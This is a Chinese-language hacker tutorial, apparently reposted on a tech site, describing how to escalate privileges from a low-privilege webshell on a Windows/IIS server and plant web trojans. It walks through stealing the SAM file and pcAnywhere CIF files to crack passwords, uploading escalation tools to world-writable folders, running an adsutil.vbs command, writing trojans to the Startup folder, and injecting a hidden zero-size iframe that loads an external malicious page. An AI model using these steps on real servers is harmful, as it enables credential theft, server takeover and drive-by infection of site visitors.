简单突破权限设置漏洞挂马

类别:编程语言 点击:0 评论:0 推荐:

简单突破权限设置漏洞挂马


今天我要说一下权限设置的问题,有时候我们拿到了一个shell,但权限太低,只能在拿到sehll的站点的目录瞎逛,对于我这样喜欢在服务器站点挂马的人来说太痛苦了。


拿一个例子吧 ,比如asp注入,动网,动感,动易,尘缘等等漏洞,好多的,反正不管怎样我们现在有个shell

当我们取得一个webshell时候,主要要做的就是看看有什末权限,来提升权限,有权限才能知道个个盘都有什末东东,这里的学问很多,

c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序\
  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:\Program Files\serv-u\

C:\WINNT\system32\config\
下它的SAM,破解密码

c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服务器支持PHP)
c:\PHP(如果服务器支持PHP)

运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

还可以用这段代码试提升,好象不是很理想的

如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。


冰狐网页木马比较常用,挂马的代码</html><iframe src="http://*****.htm" name="zhu" width="0" height="0" frameborder="0">

关于防护方面JHACKJ做过一个变态设置教程,大家看看吧,呵呵,给他做广告了,

 


本文地址:http://com.8s8s.com/it/it22918.htm